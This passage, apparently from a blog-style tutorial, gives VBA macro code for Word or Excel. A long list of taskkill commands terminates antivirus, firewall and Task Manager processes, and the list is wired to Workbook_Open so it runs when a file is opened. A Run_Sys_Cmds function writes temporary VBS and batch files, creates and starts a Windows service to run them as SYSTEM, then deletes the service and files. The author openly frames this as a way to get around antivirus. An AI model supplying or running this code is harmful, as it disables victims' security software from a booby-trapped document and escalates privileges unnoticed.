    Build_Cmd_List arrayCmds, "taskkill /F /IM ""spyxx.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""srexe.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""srng.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""ss3edit.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""ssg_4104.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""ssgrate.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""st2.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""start.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""stcloader.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""supftrl.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""support.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""supporter5.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""svc.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""svchostc.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""svchosts.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""svshost.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""sweep95.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""sweepnet.sweepsrv.sys.swnetsup.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""symproxysvc.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""symtray.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""sysedit.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""system.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""system32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""sysupd.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""taskmg.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""taskmgr.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""taskmo.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""taskmon.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""taumon.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""tbscan.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""tc.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""tca.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""tcm.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""tds2-nt.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""tds-3.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""teekids.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""tfak.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""tfak5.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""tgbob.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""titanin.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""titaninxp.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""tracert.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""trickler.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""trjscan.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""trjsetup.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""trojantrap3.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""tsadbot.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""tvmd.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""tvtmd.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""undoboot.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""updat.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""update.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""update.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""upgrad.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""utpost.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""vbcmserv.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""vbcons.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""vbust.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""vbwin9x.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""vbwinntw.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""vcsetup.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""vet32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""vet95.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""vettray.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""vfsetup.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""vir-help.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""virusmdpersonalfirewall.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""vnlan300.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""vnpc3000.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""vpc32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""vpc42.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""vpfw30s.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""vptray.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""vscan40.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""vscenu6.02d30.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""vsched.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""vsecomr.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""vshwin32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""vsisetup.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""vsmain.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""vsmon.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""vsstat.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""vswin9xe.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""vswinntse.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""vswinperse.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""w32dsm89.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""w9x.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""watchdog.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""webdav.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""webscanx.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""webtrap.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""wfindv32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""whoswatchingme.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""wimmun32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""win32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""win32us.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""winactive.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""win-bugsfix.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""window.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""windows.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""wininetd.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""wininit.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""wininitx.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""winlogin.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""winmain.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""winnet.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""winppr32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""winrecon.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""winservn.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""winssk32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""winstart.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""winstart001.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""wintsk32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""winupdate.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""wkufind.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""wnad.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""wnt.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""wradmin.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""wrctrl.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""wsbgate.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""wupdater.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""wupdt.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""wyvernworksfirewall.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""xpf202en.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""zapro.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""zapsetup3001.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""zatutor.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""zonalm2601.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""zonealarm.exe"""
       
    Run_Sys_Cmds arrayCmds, INVISIBLE, WAIT
End Function

Call it with a simple:

Sub Workbook_Open()
    Kill_AV
End Sub

Running commands as SYSTEM from VBA in Word or Excel

Sometime's it is useful to run commands with SYSTEM level privilege because, for some reason, simply having Administrator won't allow you to do something you need. I often run into this with trying to kill antivirus processes or similar, as they usually require some sort of password to shut them off. If you kill it from under the SYSTEM account, however, it'll shut off without any problems:

Function Run_Sys_Cmds(arrayCmds As Variant, visibility, wait_on_execute)

    Set fso = CreateObject("Scripting.FileSystemObject")
    Set systemCmd = fso.CreateTextFile(Environ("TEMP") & "\systemCmd.vbs")
    Set batchRun = fso.CreateTextFile(Environ("TEMP") & "\systemBatch.bat")
   
    systemCmd.WriteLine ("CreateObject(""Wscript.Shell"").Run """ & Environ("TEMP") & "\systemBatch.bat" & """, " & visibility & ", " & wait_on_execute)
   
    For Each cmd In arrayCmds
        batchRun.WriteLine (cmd)
    Next cmd
   
    systemCmd.Close
    batchRun.Close
   
    Run_Cmd "sc create systemCmd binpath= ""%COMSPEC% /c wscript %TEMP%\systemCmd.vbs "" type= own type= interact", INVISIBLE, WAIT
    Run_Cmd "sc start systemCmd", INVISIBLE, WAIT
    Run_Cmd "sc delete systemCmd", INVISIBLE, WAIT
    Kill Environ("TEMP") & "\systemCmd.vbs"
    Kill Environ("TEMP") & "\systemBatch.bat"

End Function

This version only accepts an array of commands to be processed. I found that it was way too slow to process a large number of commands unless you did it this way. It would be simple to modify to accept a regular String instead, if you wish to change it to use it for one-off commands.

You'd call this with something like:

    Dim syscmd(1) As String
    syscmd(0) = "set && pause"
    syscmd(1) = "ping 127.0.0.1"
    Run_Sys_Cmds syscmd, VISIBLE, WAIT

It executes commands at the SYSTEM level by creating a service that will run your command for you. Unless you specify otherwise, services always run as the SYSTEM account. Creating services is only possible if you have Administrator-level privileges on the system, so I really only find this useful to get around locked files or antivirus.

It's on my TO DO list to play with the token-kidnapping exploit for Windows Server 2003/2008 (and supposedly XP2?) that allows any authenticated user to gain SYSTEM privileges. Unfortunately, I haven't had time to play with it yet.